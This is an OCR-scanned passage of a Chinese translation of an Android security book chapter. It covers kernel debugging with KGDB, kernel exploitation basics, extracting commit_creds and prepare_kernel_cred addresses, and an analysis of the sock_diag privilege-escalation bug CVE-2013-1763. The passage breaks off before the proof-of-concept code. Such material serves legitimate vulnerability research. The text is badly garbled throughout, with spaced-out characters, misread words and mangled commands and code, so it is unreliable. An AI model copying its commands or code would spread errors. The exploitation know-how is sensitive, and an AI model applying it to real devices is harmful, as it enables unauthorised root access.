
[<c064a3f4>] (__sys_sendmsg+0xlcc/0x284) from [<c064b548>] 
(sys_sendmsg+0x3c/0x60) 

[<c064b548>] (sys_sendmsg+0x3c/0x60) from [<c000d940>] 
(ret_fast_syscall+0x0/0x30) 


调用 栈 精 确 显 示 了 导致 错误 的 执行 路 径 ， 包 括 函 数 的 名 称 符号 ; 还 显示 了 每 个 栈 帧 的 1r 寄 


存 器 值 。 从 中 可 以 清楚 地 看 到 栈 破坏 。 
接 下 来 ， 使 用 aump_instr 函数 显示 4 个 导致 错误 的 用 户 空间 的 指令 : 
Code: e5963008 e3530000 03e04001 0a000004 (e5933004) 
尽管 显示 这 个 数据 似乎 不 可 靠 ,， 但 可 以 用 来 诊断 问题 ， 例 如 英特尔 的 0xf00f bug。 





从 _ die 函数 返回 后 ， 开 始 执行 oops_exit 函数 。 该 函数 显示 了 一 个 随机 值 来 代表 这 个 


Oops。 
---[ end trace 3162958b5078dabf ]--- 
最 后 ， 如 果 panic_on_oops 标志 被 置 1， 内 核 会 打印 一 条 消息 并 暂停 : 


Kernel panic - not syncing: Fatal exception 


Linux 内 核 的 Oops 消息 在 内 核发 生 问题 时 提供 了 丰富 的 信息 , 对 于 追踪 问题 根源 有 极 大 的 


帮助 。 
10.4.3 ”使 用 KGDB 进行 Live 调试 


























只 通过 内 核 崩 演 日 志 来 调试 是 不 够 的 。 内 核 还 有 几 个 选项 和 工具 ， 可 以 实现 实时 调试 。 
在 .config 文 件 中 搜索 aebug 字 符 串 ,能 找到 80 多 个 调试 选项 .在 Documentation 目录 搜索 “debug”， 
能 找到 2300 多 个 结果 。 这 些 特性 具有 许多 功能 ， 有 些 能 增加 调试 日 志 ， 有 些 能 打开 完整 的 交互 











式 调 试 功能 。 








目前 , 交互 式 调试 体验 最 好 的 是 KGDB, 但 它 并 不 总 是 最 好 的 选择 。 举 个 例子 ,在 经 常 被 调 














一 些 准备 ， 之 后 就 能 attach 到 内 核 并 使 用 KGDB 了 。 
1. 准备 设备 











用 的 地 方 设置 断 点 ,会 让 调试 变 得 很 慢 。 这 种 情形 下 ,使 用 自 定义 的 插 桩 或 是 类 似 Kprobe 的 工 
有 具 更 加 合适 。 本 节 主 要 介绍 使 用 KGDB 进行 交互 式 调试 。 在 开始 之 前 ， 需 要 为 设备 和 开发 机 作 


Linux 内 核 支 持 通过 USB 和 console 端口 使 用 KGDB。 这 两 种 机 制 分 别 通过 kgaqbabgp 和 
kgdboc 内 核 命令 行 参数 来 控制 , 但 是 都 需要 一 些 特殊 的 准备 工作 : 使 用 USB 端口 需要 一 个 特殊 

















的 USB 驱动 , 而 使 用 console 端口 需要 访问 设备 上 的 一 个 串口 。 由 于 访问 Galaxy Nexus 唱 
关 资 料 较 多 ， 所 以 以 console 端口 为 例 比 较 理 想 。 制 作 线 的 详细 信息 请 参考 第 13 章 。 

















a 口 的 相 


线 制 作 完成 后 ， 需 要 制作 一 个 自 定义 的 引导 镜像 ， 包 括 创建 一 个 自 定 义 内 核 和 RAM 盘 。 
由 于 内 核 编译 需要 时 间 ， 所 以 先 创建 自 定义 内 核 。 要 想 使 用 KGDB, 需要 修改 内 核 中 的 两 个 
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参数 : 配置 和 序列 初始 化 代码 。 需 要 配置 的 参数 见 表 10-1。 














表 10-1 开启 KGDB 的 配置 参数 
特 ”性 描 述 
CONFIG KGDB=y 开启 内 核 的 KGDB 支持 
Galaxy Nexus 默认 开启 自 带 的 FIQ 调试 器 
CONFIG OMAP FIQ DEBUGGER=n 
关闭 它 ， 防 止 与 使 用 串口 的 KGDB 发 生 冲 突 


CONFIG CMDLINE=[...] 


CONFIG WATCHDOG=n 
CONFIG OMAP_ 
WATCHDOG=n 























通过 设置 kgdboc 来 使 
上 引导 控制 台 也 使 用 串 





] 正 确 的 串 











口 和 波 特 率 

















计 











防止 看 门 狗 在 调试 时 





为 了 让 串口 连接 自制 的 线 ， 还 需要 稍微 修改 内 核 。 只 需要 修改 OMAP ( Open Multimedia 
Application Platform ) 电路 板 的 一 行 串口 初始 化 代码 即 可 。 实 现 这 个 修改 的 补丁 ( kgdb-tuna- 
usb-serial.diff ) 和 表 10-1 中 配置 的 模板 都 包含 在 本 章 的 补充 材料 中 , 可 在 http://www.wiley.com/go/ 
androidhackershandbook 下 载 。 
10.3 节 。 将 tuna_qdefconfig 模 板 蔡 换 成 材料 中 的 tunakgdb_gdefconfig。 
需要 运行 的 命令 如 下 : 


dev:~/android/src/kernel/omap $ make tunakgdb defconfig 




















[2 


dev:~/android/src/kernel/omap $ make -j 6 


| 





在 编译 内 核 的 同时 ， 可 以 开始 编译 自 定义 RAM 盘 。 需 要 纺 














编译 内 核 请 参照 








; make modules 




















个 自 定义 的 initrd.img 来 通过 


ADB 访问 设备 。 要 记 住 ，Galaxy Nexus 的 Micro USB 口 现在 被 用 作 串 口 ， 所 以 USB 上 的 ADB 








服务 无 法 使 用 。 好 在 ADB 可 以 通过 设置 service.adb.tcp.port 系统 


相关 命令 如 下 所 示 : 


警告 


dev:~/android/src/ 
dev:~/android/src/ 


kernel/omap $ m 
kernel/omap/ini 


~/android/takju-jdq39/boot.img 


Bsa :x] 
dev:~/android/src/ 
1164 blocks 
dev:~/android/src/ 


kernel/omap/ini 


kernel/omap/ini 


patching file ramdisk/init.rc 


dev:~/android/src/ 
tcpadb-initrd.img 





kernel/omap/ini 





属性 来 监听 TCP 端口 ， 





kdir -p initrd && cd $_ 
trd $ abootimg -x \ 


trd $ abootimg-unpack-initrd 


trd $ patch -p0 < maguro-tcpadb-initrc.diff 





trd $ mkbootfs ramdisk/ | gzip > \ 


abootimg-pack-initra 命令 不 会 生成 与 Nexus 系列 设备 兼容 的 initrd 镜像 ， 应 当 使 


用 ASOP 仓库 中 system/core/cpio 目录 下 的 mkbootfs。 这 个 工具 会 在 AOSP 镜像 编译 的 


时 候 生 成 。 
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首先 ， 从 原 厂 boot.img 镜像 中 提取 initrd.img。 然 后 使 用 abootimg-unpack-initrd 命令 
解压 缩 initrd.img， 得 到 一 个 ramdisk 目录 。 接 下 来 ,为 initrc 打 一 个 补丁 来 打开 TCP 上 的 ADB 
(补丁 见 本 章 补充 材料 )。 最 后 ， 将 修改 后 的 内 容重 打包 成 tcpadb-initrd.img。 

最 后 一 步 就 是 编译 内 核 ， 完 成 后 执行 一 些 熟悉 的 命令 : 


dev:~/android/src/kernel/omap/initrd $ mkbootimg --kernel \ 
../arch/arm/boot/zImage --ramdisk tcpadb-initrd.img -o kgdb-boot.img 
dev:~/android/src/kernel/omap/initrd $ adb reboot bootloader 
dev:~/android/src/kernel/omap/initrd $ fastboot flash boot kgdb-boot.img 
dev:~/android/src/kernel/omap/initrd $ fastboot reboot 


这 时 设备 会 重启 ， 然 后 开始 运行 新 的 内 核 ， 并 会 启用 TCP 上 的 ADB。 确保 设备 可 以 通过 
Wi-Fi 连接 桌面 环境 ， 然 后 使 用 TCP 上 的 ADB 来 连接 设备 ， 如 下 所 示 : 


dev:~/android/src/kernel/omap $ adb connect 10.0.0.22 
connected to 10.0.0.22:5555 

dev:~/android/src/kernel/omap $ adb -s 10.0.0.22:5555 shell 
shell@android:/ $ 


最 后 需要 注意 的 是 ,这 种 配置 方式 会 导致 一 些 不 正常 的 情况 出 现 。 当 设备 屏幕 变 暗 或 关闭 时 ， 
会 发 生 两 件 事 : Wi-Fi 性 能 急剧 下 降 和 串口 被 禁用 。 更 糟糕 的 是 ， 保 持 屏幕 被 点 亮 的 内 置 选项 无 
法 使 用 。 使 用 正常 的 设置 菜单 最 多 将 屏幕 变 暗 的 等 待 时 间 设 置 为 10 分 钟 ， 还 是 不 能 满足 需要 。 
一 个 叫 作 “stay awake” 的 开发 选项 能 让 手机 在 充电 的 时 候 保 持 屏 幕 点 亮 ， 但 是 在 使 用 自 定义 的 
串口 线 时 ,设备 的 电池 不 会 充电 。 雷 运 的 是 ，Google Play 中 有 一 些 应 用 能 够 让 设备 的 屏幕 永久 
保持 点 亮 。 在 设备 启动 后 ， 选 择 一 款 这 样 的 App 非常 有 用 。 

2. 准备 主机 

要 实现 调试 设备 的 内 核 ， 目 前 只 剩 下 配置 主机 的 几 个 步骤 了 。 准 备 设备 的 时 候 , 已 经 在 主机 
上 配置 好 了 编译 环境 ,生成 了 包含 所 有 符号 的 内 核 二 进 制 文件 。 在 连接 调试 带 之 前 ， 只 需 做 最 后 
一 件 事 。 

配置 内 核 时 , 设置 内 核 命令 来 用 串口 达到 两 个 目的 。 首先, 通过 配置 kgdboc 参数 告诉 内 核 : 
KGDB 使 用 串口 。 第 二 ， 通 过 配置 androigdboot .console 参数 告诉 内 核 : 串口 是 控制 台 。 为 
了 区 分 这 两 种 数据 流 ， 使 用 一 个 叫 作 agent-proxy 的 程序 ， 可 以 在 Linux Kernel 的 Git 仓库 
( git://git.kernel.org/pub/scm/utils/kernel/kgdb/agent-proxy.git ) 下 载 。 下 面 的 命令 展示 了 如 何 使 用 


agent-proxy: 



































































































































dev:~/android/src/kernel/omap $ ./agent-proxy/agent-proxy 4440^4441 0 \ 
/dev/ttyUSB0,115200 & sleep 1 

[1] 27970 

Agent Proxy 1.96 Started with: 4440^4441 0 /dev/ttyUSBO0,115200 

Agent Proxy running. pid: 28314 

dev:~/android/src/kernel/omap $ nc -t -d localhost 4440 & sleep 1 

[2 28425 

[ 4364.177001] max17040 4-0036: online = 1 vcell = 3896250 soc = 77 status = 
2 

health = 1 temp = 310 charger status = 0 

[| 
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在 后 台 运 行 agentproxy， 并 将 KGDB 和 控制 台 的 流量 分 别 分 离 至 4440 端口 和 4441 端口 。 
配置 好 串口 和 波 特 率 ， 就 可 以 使 用 了 。 通 过 Netcat 连接 端口 4440 时 ， 得 到 的 就 是 控制 台 输 出 
真 棒 ! 

3. 连接 调试 器 

现在 所 有 的 准备 工作 都 已 经 完成 ， 连 接 调 试 右 的 方法 十 分 简单 直接 。 下 面 的 GDB 脚本 自动 
化 了 这 个 步骤 : 


Set remoteflow off 
set remotebaud 115200 
target remote :4441 


执行 arm-eabi-gdb， 如 下 所 示 : 


dev:~/android/src/kernel/omap $ arm-eabi-gdb -q -x kgdb.gdb ./vmlinux 
Reading symbols from /home/dev/android/src/kernel/omap/vmlinux...done. 


[Ey 

除了 让 GDB 运行 上 面 的 脚本 以 外 ,还 需要 告诉 GDB 将 二 进 制 文件 vmlinux 作为 可 执行 文件 。 
目的 是 告诉 GDB 从 哪里 获得 内 核 的 符号 ， 以 及 如 何 找到 对 应 的 源 代码 。 

GDB 客户 端 这 时 候 正在 等 待 一 些 动作 发 生 。 如 果 和 希望 取得 控制 权 ， 可 以 在 设备 上 使 用 root 
权限 运行 如 下 命令 : 

root@android:/ # echo g > /proc/sysrgq-trigger 

然后 可 以 看 到 GDB 客户 端 显 示 如 下 : 


Program received signal SIGTRAP, Trace/breakpoint trap. 


























kgdb_breakpoint () at kernel/debug/debug_core.c:954 
954 arch_ kgdb_breakpoint (); 
(gdb) 


在 此 ， 就 可 以 设置 断 点 、 查 看 代码 、 修 改 内 核 内 存 ， 等 等 。 我 们 已 经 实现 了 交互 式 源 代 码 级 
的 真 机 内 核 远程 调试 ! 


4. 在 模块 中 设置 断 点 
本 节 介 绍 如 何在 “Hello World” 模 块 中 设置 断 点 , 作为 内 核 调试 的 最 后 一 个 例子 。 在 KGDB 


中 处 理 内 核 模块 需要 一 些 额外 的 步 又。 模块 加 载 后 ， 查 看 加 载 位 置 ; 


root@android:/data/local/tmp # echo 1 > /proc/sys/kernel/kptr_restrict 
root@android:/data/local/tmp # lsmod 
ahh_helloworld mod 657 0 - Live 0xbf010000 


要 看 到 模块 地 址 ， 需 首先 降低 kptr_restrict 限制 。 然 后 通过 使 用 1smoa 命令 或 查看 
/proc/modules 来 列 出 所 有 加 载 模块 。 使 用 这 个 地 址 信息 就 可 以 让 GDB 找到 相应 的 模块 : 


(gdb) add-symbol-file drivers/ahh hellowor1d/ahh_hel1lowor1d mod.ko 0xbf010000 
add symbol table from file "drivers/ahh helloworld/ahh helloworld mod.ko" at 
.text_addr = 0xbf010000 
(yY or n) y 
(gdb) x/i Oxbf010000 
0xbf010000 <init_ module>: mov rl2, sp 
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(gdb) 1 init module 
5 


12 int init module(void) 
13 { 
工交 printk (KERN_INFO "%s: HELLO WORLD!@#!@#\n", _ this module.name); 


S| 

(gdb) break cleanup_module 

Breakpoint 1 at Oxbf010034: file drivers/ahh helloworld/ahh_ helloworld mod.c, 
line 20. 

(gdb) cont 


GDB 加 载 符号 后 就 能 知道 模块 的 源 代码 。 也 可 以 使 用 源 代码 信息 来 设置 断 点 。 当 模块 被 
unload 时 ， 断 点 会 触发 : 











Breakpoint 1，0xbf010034 in cleanup_modqule () at 
drivers/ahh helloworld/ahh_ helloworld mod.c:20 
20 下 





不 管 选择 何 种 方法 ， 调 试 内 核 都 是 捕捉 和 利用 漏洞 的 必要 步骤。 无 论 是 通过 骨 溃 dump 进行 
离线 调试 , 还 是 使 用 交互 式 的 在 线 调试 , 都 能 帮助 研究 人 员 或 者 开发 者 更 加 深入 地 理解 当前 发 生 
的 问题 。 


10.5 “内核 漏洞 利用 


代号 “果冻 豆 ”( Jelly Bean ) 的 Android 4.1 在 Android 安全 发 展 过 程 中 是 一 个 关键 点 。 正 如 
第 12 章 中 讨论 的 , 这 个 版 本 的 发 布 使 得 用 户 空间 的 漏洞 利用 更 加 困难 。 男 外 ，Android 团队 下 了 
很 大 功夫 才 将 SELinux 引入 平台 。 综合 以 上 两 点 考虑 ， 攻 击 Linux 内 核 变 成 了 很 明确 的 选择 。 作 
为 攻击 目标 而 言 ，Linux 内 核 并 不 难以 攻破 。 尽 管 有 一 些 有 效 的 防御 措施 ， 但 是 还 有 许多 可 以 攻 
击 的 地 方 。 

在 过 去 的 10 年 里 ， 有 很 多 介绍 内 核 漏洞 利用 的 资源 得 到 公开 。 在 这 些 演讲 稿件 、 博 客 、 白 
皮 书 和 利用 代码 中 ， 有 一 本 书 尤 其 突出 : Enrico Perla 和 Massimiliano Oldani 合 著 的 4 Guide to 
Kernel Exploitation: Attacking the Core。 这 本 书包 含 的 内 容 很 广 ， 甚 至 涉及 Linux 以 外 的 内 核 ， 但 
是 并 没有 介绍 ARM 架构 的 相关 主题 。 本 节 通 过 讨论 典型 的 内 核 配置 , 引入 Android 设备 中 Linux 
内 核 漏 洞 的 利用 ， 并 介绍 几 个 漏洞 利用 案例 。 















































10.5.1 ”典型 Android 内 核 


对 于 不 同 的 Android 设备 ， 其 使 用 的 Linux 内 核 也 不 相同 。 这 些 差别 包括 内 核 版 本 号 、 配 置 
选项 、 和 特定 设备 的 驱动 等 。 尽管 存在 差异 , 但 也 有 许多 共同 点 。 本 节 描 述 Android 设备 中 Linux 
内 核 的 差异 和 相似 之 处 。 

1. 内 核 版 本 

Android 设备 使 用 的 内 核 虽 然 有 差别 ,但 是 主要 分 为 4 组 : 2.6.x、3.0.x、3.1.Xx 和 3.4.x。 可 以 
认为 这 些 特定 的 组 别 是 设备 的 代数 ， 例 如 第 一 代 设 备 使 用 2.6.x 内 核 ， 最 新 一 代 使 用 3.4.x 内 核 。 
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Android 4.0 冰淇淋 三 明治 是 第 一 个 使 用 3.0.x 系列 以 上 内 核 的 Android 系统 。 一 些 较 早期 的 果冻 
豆 (Android 4.1 ) 设备 ， 例 如 2012 年 的 Nexus 7， 使 用 的 是 3.1.x 内 核 。 搭 载 Android 4.2 系统 的 
Nexus 4 是 首次 使 用 3.4.x 内 核 的 机 型 。 尽 管 最 新 的 Linux 内 核 版 本 是 3.12， 但 撰写 本 书 的 时 候 ， 
还 没有 Android 设备 使 用 3.4.x 版 本 以 上 的 内 核 。 

2. 配置 

这 些 年 来 ，Android 团队 一 直 在 修改 Android 设备 的 内 核 配置 。Android 开发 者 文档 和 CDD 
详细 说 明了 这 些 配置 。 另 外 ， 兼 容 性 测试 套件 (CTS ) 验证 了 一 些 符合 要 求 的 内 核 配 置 。 例 如 ， 
对 于 较 新 的 Android 版 本 ，CTS 会 检查 两 个 特殊 的 配置 选项 : CONFIG_IKCONFIG 和 
CONFIG_MODULES。 也许 是 基于 安全 考虑 , 这 些 配置 必须 被 关闭 。 由 于 禁用 了 可 加 载 模块 的 支持 ， 
要 想 在 获得 root 权限 的 手机 内 核 空 间 中 运行 代码 就 变 得 非常 困难 。CTS 也 会 检查 内 核 配置 谋 入 的 
选项 是 否 被 禁用 ， 因 为 把 内 核 配 置 文件 编译 进 内 核 会 通过 CONFIG_PHYS_OFFSET 泄露 内 核 的 基 
址 。 这 两 个 配置 之 外 的 检查 选项 会 在 第 12 章 中 介绍 。 如 果 深 入 查看 大 量 设备 内 核 配 置 的 变动 ， 
会 有 其 他 有 趣 的 发 现 。 

3. 内 核 堆 

堆 内 存 和 内 核 配 置 细节 的 相关 度 较 高 。Linux 内 核 有 许多 内 存 分 配 的 API， 大 多 数 都 基于 下 
层 的 kmalloc。 编 译 时 ， 工 程 师 必须 在 三 种 堆 的 实现 中 进行 选择 : SLAB，SLUB 和 SLOB。 大 
多 数 Android 设备 使 用 SLAB 分 配器 , 少数 使 用 SLUB 分 配器 。 尽 管 没 有 Android 设备 使 用 SLOB 
分 配器 ， 但 目前 很 难 完全 将 其 排除 。 

在 内 核 地 址 空间 中 , 堆 分 配 有 一 些 不 确定 性 。 内核 堆 的 实际 状态 受到 很 多 因素 的 影响 。 首 先 ， 
从 启动 到 运行 漏洞 利用 程序 的 这 段 时 间 内 , 堆 内 存 的 操作 大 部 分 是 未 知 的 。 其 次 ， 从 远程 或 较 低 
权限 发 起 攻击 , 都 意味 着 攻击 者 对 于 正在 运行 的 操作 有 着 很 少 的 控制 , 所 以 堆 很 可 能 在 利用 程序 
运行 时 受到 影响 。 

从 编程 人 员 的 角度 来 看 ， 堆 实现 的 细节 并 不 是 十 分 重要 ; 但 是 对 于 利用 程序 开发 者 来 说 ,这 
些 细节 决定 了 发 生 的 是 可 靠 的 代码 执行 利用 , 还 是 毫 无 价值 的 朋 溃 。4 Guide to Kernel Exploitation 
和 Phrack 杂志 的 文章 提供 了 关于 SLAB 和 SLUB 分 配器 的 利用 方法 。 此 外 ,Dan Rosenberg 在 2012 
年 的 Infiltrate 会 议 上 讨论 了 SLOB 分 配器 的 利用 技术 。 其 论文 和 幻灯 片 的 标题 为 “ 堆 的 麻烦 : 攻 
破 Linux 内 核 SLOB 分 配器 " ， 随 后 发 布 在 : http://infiltratecon.conm/archives.html。 

4. 地 址 空间 布局 

现代 操作 系统 将 虚拟 地 址 空间 分 为 内 核 空间 和 用 户 空 间 ， 分 界线 依 有 具体 设备 而 定 。 大 部 分 
Android 设备 使 用 传统 的 3G 划分 方案 , 即 内 核 使 用 位 于 高 地 址 的 1G 空间 ( 0xc0000000 及 以 上 )， 
用 户 空间 使 用 位 于 低地 址 的 3G 空间 ( 0xc0000000 以 下 )。 在 大 多 数 Linux 系统 中 ,包括 所 有 的 
Android 设备 ， 内 核 可 以 直接 访问 用 户 空间 的 内 存 。 内 核 不 仅 可 以 读 写 内 核 空 间 的 内 存 ， 而 且 可 
以 在 其 中 执行 代码 。 

本 章 之 前 提 到 ， 内 核 是 一 个 单独 的 镜像 ,因此 所 有 的 全 局 符号 都 位 于 内 存 的 静态 地 址 中 。 利 
用 程序 开发 者 可 以 利用 这 些 位 于 静态 地 址 中 的 全 局 符号 ， 轻 松 开 发 出 利用 代码 。 另 外 ,在 ARM 
的 Linux 内 核 中 ,除了 近期 发 布 的 版 本 ,大 多 数 代 码 区 是 可 读 可 写 可 执行 的 。 最 后 ，Linux 内 核 大 
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量 运用 了 函数 指针 和 间接 内 存 访 问 。 这 些 方式 提高 了 内 存 破 坏 漏 洞 变 成 任意 代码 执行 的 可 能 性 。 
综 上 所 述 , Android 上 Linux 内 核 的 漏洞 利用 比 用 户 空 间 的 利用 更 加 简单 。 简 而 言 之 , Android 
上 的 Linux 内 核 比 其 他 现代 目标 要 容易 攻击 得 多 。 








10.5.2 ”获取 地 址 


如 前 所 述 , 内 核 编译 工具 向 内 核 镜像 中 庶 人 了 一 些 有 关 安 全 的 信息 , 需要 特别 注意 的 是 符号 
表 。 在 内 核 中 有 许多 全 局 数据 和 函数 ， 每 个 都 用 一 个 符号 名 来 表示 。 这 些 名 字 和 相应 的 地 址 信息 
都 通过 proc 文件 系统 下 的 kallsyms 暴露 给 用 户 空间 。 内 核 镜 像 的 加 载 方式 使 得 所 有 全 局 符号 都 
使 用 不 变 的 静态 地 址 ( 即使 系统 重启 )。 从 攻击 者 的 角度 来 看 ， 这 是 一 个 很 大 的 优势 ， 因 为 它 提 
供 了 一 张 内 核 地 址 空间 的 图 谱 。 了 解 内 存 中 关键 的 函数 和 数据 结构 , 极 大 地 方便 了 利用 程序 开发 。 

CONFIG_KALLSYMS 配置 选项 决定 了 内 核 符 号 表 是 否 包 含 在 二 进 制 镜像 中 。 幸 运 的 是 ， 几 乎 
所 有 Android 设备 (除了 一 些 TV 设备 ) 都 开启 了 这 个 选项 。 事 实 上 ， 禁 用 这 个 选项 会 极 大 增加 
内 核 调试 的 难度 。 在 果冻 豆 之 前 , 通过 读 取 /proc/kallsyms 文件 , 可 以 获取 几乎 所 有 的 内 核 符号 名 
称 和 地 址 。 果 冻 豆 及 之 后 的 版 本 都 会 防止 使 用 该 方法 ， 不 过 好 在 还 有 其 他 方法 。 

在 Android 系统 中 , 设备 制造 商 把 Linux 内 核 装 入 每 个 设备 的 固件 中 ,升级 内 核 就 需要 OTA 
升级 或 者 刷 入 一 个 新 的 系统 镜像 。 因 为 每 个 设备 只 有 一 个 二 进 制 内 核 镜像 ， 所 以 可 以 用 以 下 两 种 
方法 中 的 一 种 来 实现 。 第 一 ， 可 以 先 获 取 二 进 制 镜 像 ， 然 后 通过 静态 方法 得 到 大 多 数 内 核 符号 。 
第 二 ， 可 以 使 用 信息 泄露 漏洞 (如 CVE-2013-6282 ) 直接 从 内 核 内 存 中 读 取 符号 表 信息 。 这 两 种 
方法 都 绕 过 了 防止 直接 读 取 /proc/kallsyms 的 保护 限制 。 获得 的 地 址 可 以 用 于 本 地 攻击 , 也 可 以 用 
于 远程 攻击 ， 因 为 它们 都 是 硬 编码 的 。 

“android-rooting-tools” 项 目 中 的 kallsymprint 工具 可 以 从 静态 文件 中 抽取 符号 表 。 编 译 
这 个 工具 需要 Github 中 两 个 不 同 项 目的 源 代码 : 主 项 目 与 其 GIT 子 模 块 。 编 译 这 个 工具 并 针对 
Nexus 5 原 厂 镜像 运行 的 步骤 如 下 : 


dqev:~/andqroid/n5/nammernhead-krt16m/img/boot $ git clone \ 
https://github.com/fi01/kallsymsprint .git 

Cloning into 'kallsymsprint'... 

[| 

dev:~/android/n5/hammerhead-krt1i6m/img/boot $ cd kallsymprint 
dev:~/android/n5/hammerhead-krt1l6m/img/boot/kallsymprint $ git submodule init 
Submodule 'libkallsyms' 
(https://github.com/android-rooting-tools/libkallsyms .git) 

registered for Path 'libkallsyms' 
dev:~/android/n5/hammerhead-krt1i6m/img/boot/kallsymprint $ git submodule \ 
update 
CLONiTnog intO LD]syine ,ss 

[Ey]| 

Submodule path 'libkallsyms': checked out 
'ffe994e0b161f42a46d9cb3703dac844f5425ba4' 


检 出 的 仓库 包含 一 个 二 进 制 镜像 , 但 是 一 般 不 建议 直接 运行 不 可 信 的 二 进 制 文件 。 理解 了 源 
代码 ， 就 可 以 使 用 下 面 的 命令 进行 编译 : 
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dev:~/android/n5/hammerhead-krt1l6m/img/boot/kallsymprint $ rm kallsymprint 
dev:~/android/n5/hammerhead-krt1l6m/img/boot/kallsymprint $ gcc -m32 -I. \ 
-O kallsymsprint main.c libkallsyms/kallsyms_in memory.c 


Ls 
从 源 代码 重新 编译 二 进 制 镜像 后 ， 从 解压 的 Nexus 5 内 核 中 提取 符号 ， 如 下 所 示 : 


dev:~/android/n5/hammerhead-krt1l6m/img/boot/kallsymprint $ cd .. 
dev:~/android/n5/hammerhead-krti6m/img/boot $ ./kallsymsprint/kallsymsprint \ 
piggy 2> /dev/null | grep -E '(prepare _ kernel cred|commit_creds)' 

co01lbac14 commit_creds 

c01bpb404 prepare_ kernel_cred 


这 两 个 符号 在 很 多 内 核 权 限 提升 的 利用 程序 中 都 会 用 到 ， 包 括 下 一 节 的 案例 分 析 。 


10.5.3 ”案例 分 析 


深入 分 析 利用 程序 开发 过 程 ,可 以 很 好 地 理解 内 核 漏洞 利用 中 的 一 些 概念 。 本 节 提 供 了 3 个 
案例 ， 用 来 介绍 Android 设备 中 的 漏洞 是 如 何 被 利用 的 。 首 先 简要 介绍 一 系列 有 趣 的 Linux 内 核 
漏洞 ， 除 了 Android 设备 ， 它 们 还 影响 了 大 量 其 他 设备 。 然 后 深入 理解 利用 程序 ， 将 在 一 些 特定 
环境 下 开发 和 运行 的 内 存 破 坏 漏洞 利用 代码 ， 移 植 到 同样 受到 影响 的 Android 设备 上 。 

1. sock_diag 

sock_diag 漏洞 是 介绍 Android 设备 Linux 内 核 漏 洞 利 用 的 绝 佳 案例 。 这 个 bug 是 在 Linux 内 
核 3.3 版 本 的 开发 过 程 中 引入 的 。 昌 然 目前 没有 Android 设备 采用 3.3 版 本 的 内 核 ， 但 是 有 一 些 
使 用 了 3.4 版 本 的 内 核 ， 包 括 搭载 Android 4.3 及 之 前 版 本 系统 的 Nexus 4， 以 及 一 些 其 他 厂商 的 
设备 ， 例 如 HIC One。 通 过 这 个 漏洞 ， 这 些 受 影响 的 设备 无 需 清 空 用 户 数据 就 能 被 root。 男 外 ， 
攻击 者 可 以 在 远程 攻击 浏览 器 之 后 利用 这 个 漏洞 来 提 权 , 从 而 取得 手机 的 完全 控制 权 。 这 个 漏洞 
被 赋予 编号 CVE-2013-1763， 描 述 如 下 : 











































































































在 Linux 内 核 3.7.10 版 本 之 前 ，net/core/sock diag.c 中 的 sock_diag_rcv_msg 
函数 存在 数组 下 标 错误 ， 本 地 用 户 可 以 通过 构造 一 个 具有 较 大 family 值 的 Netlink 消 
息 进 行 提 权 。 





正如 CVE (Common Vulnerabilities and Exposures ) 的 描述 所 示 ， 内 核 在 处 理 Netlink 消息 
时 会 调用 存在 漏洞 的 函数 。 具 体 来 说 ， 到 达 这 个 函数 有 两 个 关键 条 件 。 首 先 ， 消 息 必须 使 用 
NETLINK_SOCK_DIAG 协议 的 Netlink 套 接 字 来 发 送 。 其 次 ,这 个 消息 必须 指定 一 个 SocK_DIAG_ 
BY_FAMILY 的 nlmsg_type 字段 。 一些 x86 和 x86 64 下 的 公开 漏洞 利用 实现 了 这 些 细节 。 

CVE 的 描述 还 指出 ， 漏 洞 存在 于 Linux 内 核 源 代码 net/core/sock diag.c 的 ”sock_ qiag 
rcv_msg 了 困 数 中 。 可 以 看 到 ， 这 在 严格 意义 上 并 不 准确 。 相 应 函数 的 源 代码 如 下 : 

120 static int sock_diag_rcv_msg(struct sk _ buff *skb, struct nlmsghdr 

*n1h) 


121 
和 int err; 
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P23 struct sock_diag req *req = NLMSG_ DATA (nln); 

124 struct sock_diag handler *hndl; 

由 光电 

126 if (nlmsg_len(nlh) < Sizeof(*red) ) 

127 return -EINVAL; 

128 

站 多 9 hndl = sock_ diag_ lock handler (req->sdiag_ family); 





汪 员 数 被 出 用 时 ，nlh 参数 来 自 于 非特 权 用 户 发 送 的 消息 ， 消 息 中 的 数据 就 是 Netlink 消息 的 


载荷 。 第 129 行 sock_qdiag_req 结构 体 中 的 sdiag_family 被 传递 到 了 sock_diag_lock_ 


handler 国 数 ， 该 函数 的 代码 如 下 : 


105 static inline struct sock_ diag handler *sock_ diag_lock handler (int 
family) 

106 { 

107 if (sock_ diag handlers[family] == NULL) 

108 request_ module("net-pf-%$d-proto-%d-type-%d", PF_NETLINK, 

109 NETLINK_SOCK_DIAG, family); 

110 

111 mutex_lock(&sock_diag table mutex); 

112 return sock_ diag handlers[family]; 

113 } 





在 这 个 函数 中 ，family 参数 来 自 于 发 送 消息 的 用 户 。 在 第 107 行 ， 这 个 参数 被 用 作 数 组 的 
下 标 , 来 检查 相应 sock_dqiag_handalers 数组 的 元 素 是 否 为 空 。 这 里 并 没有 检查 这 个 下 标 是 否 
在 数组 的 边界 范围 内 。 在 第 112 行 ,数组 中 的 元 素 被 返回 到 调用 函数 中 , 但 是 其 重要 性 现在 还 不 
明显 。 下 面 回 到 调用 函数 ， 跟 踪 返 回 结果 是 如 何 被 处 理 的 。 


continued from sock_diag_rcv_msg in net/core/sock diag.c 












































129 hndl = sock_ diag_ lock handler (req->sdiag_ family); 
130 if (hndl == NULL) 

于 汪汪 err = -ENOENT; 

二 32 else 

下 汪汪 err = hndl->dump (skb, nlh); 




















第 eit #。 返 回 结 果 被 保存 在 nana1 变量 中 , 在 第 130 行 再 次 进行 是 否 为 空 的 检查 
后 ,内 核 将 这 个 变量 作为 函数 指针 来 调用 。 相 信 有 漏洞 研究 经 验 的 读者 已 经 看 到 了 这 个 漏洞 的 湾 
ee 

因此 ， 可 以 让 内 核 从 数组 边界 之 外 取得 这 个 变量 , 但 是 现在 还 不 能 直接 控制 hnal 变量 。 为 
了 控制 它 , 需要 让 它 指向 可 以 控制 的 区 域 。 如 果 不 知道 数组 边界 以 外 的 内 存 是 什么 , 就 无 法 确定 
该 传人 什么 family 值 。 为 了 和 弄 清 楚 这 个 问题 ， 我 们 构造 一 个 概念 验证 程序 ( proof-of-concept )， 
接收 一 个 命令 行 参 数 来 作为 family 变量 的 值 ， 并 计划 尝试 一 系列 的 值 作为 index。 如 果 内 核发 
生 崩 演 ， 设备 会 重启 。/proc/last_kmsg 模块 使 我 们 能 够 看 到 崩溃 点 的 上 下 文 和 内 核 空 间 内 存 中 的 
相应 值 。 下 面 的 代码 片段 展示 了 自动 化 这 一 过 程 所 用 到 的 脚本 和 命令 行 


